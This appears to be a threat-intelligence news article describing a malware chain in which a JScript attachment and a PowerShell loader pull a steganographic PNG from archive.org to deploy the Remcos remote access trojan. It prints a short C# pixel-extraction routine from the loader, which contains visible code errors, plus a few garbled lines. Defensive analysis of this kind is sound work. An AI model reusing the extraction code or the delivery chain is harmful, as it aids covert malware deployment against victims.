Security researchers have uncovered a novel malware delivery chain in recent weeks that leverages the Internet Archive’s legitimate infrastructure to host obfuscated payloads.
The attack begins with a seemingly innocuous JScript file delivered via malspam, which in turn invokes a PowerShell loader.
This PowerShell script reaches out to the Internet Archive (archive.org) to retrieve a benign-looking PNG image that, upon closer inspection, houses a hidden .NET loader encoded within its pixel data.
Researchers noted that this clever repurposing of a trusted web property allowed the attackers to blend malicious traffic seamlessly with legitimate archival requests, complicating detection efforts.
VMRay analysts identified the initial JScript loader as the first stage, executed when a victim opens a malicious attachment. The script instantiates a WScript.Shell object and executes PowerShell with a Base64-encoded command string.
When decoded, the command connects to a URL under archive.org, downloads image.png, and passes it to an in-memory .NET assembly extractor.
The extraction routine reads each pixel’s RGB values and reconstructs the original DLL byte stream.
.webp)
In a matter of seconds, the .NET loader establishes persistence by creating a registry Run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun.
It then decompresses and launches the final payload: a Remcos remote access trojan. The Remcos instance connects to its command-and-control (C2) server via a Duck DNS subdomain, ensuring dynamic resolution and redundancy.
Subsequent beaconing and module loading occur entirely in memory, leaving minimal forensic artifacts on disk. This memory-only execution chain highlights the adversary’s emphasis on evading traditional signature-based detection tools.
The implications of abusing a high-reputation archive for malware hosting are profound. By embedding malicious code within an innocuous image on archive.org, attackers exploit the archive’s HTTPS certificates and content delivery network to avoid raising red flags.
Network defenders may see only an encrypted HTTPS request to archive.org, which is typically whitelisted, thereby bypassing firewall and proxy inspection.
The obfuscation layers—JScript, Base64, RGB pixel encoding, in-memory .NET execution—compound the stealth of the campaign.
public byte[] ExtractPayload(Bitmap bmp) {
    List bytes = new List();
    for (int y = 0; y < bmp.Height; y++) {
        for (int x = 0; x < bmp.Width; x++) {
            Color pixel = bmp.GetPixel(x, y);
            if (!(pixel.R == 0 && pixel.G == 0 && pixel.B == 0)) {
                bytes. Add(pixel.R);
                bytes. Add(pixel.G);
               bytes. Addd(pixel.B);
            }
        }
    }
    return Decompress(bytes.ToArray());
}  Here, the infection mechanism shows that JScript invocation through in-memory payload deployment—revealing how each stage subverts common defensive controls.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
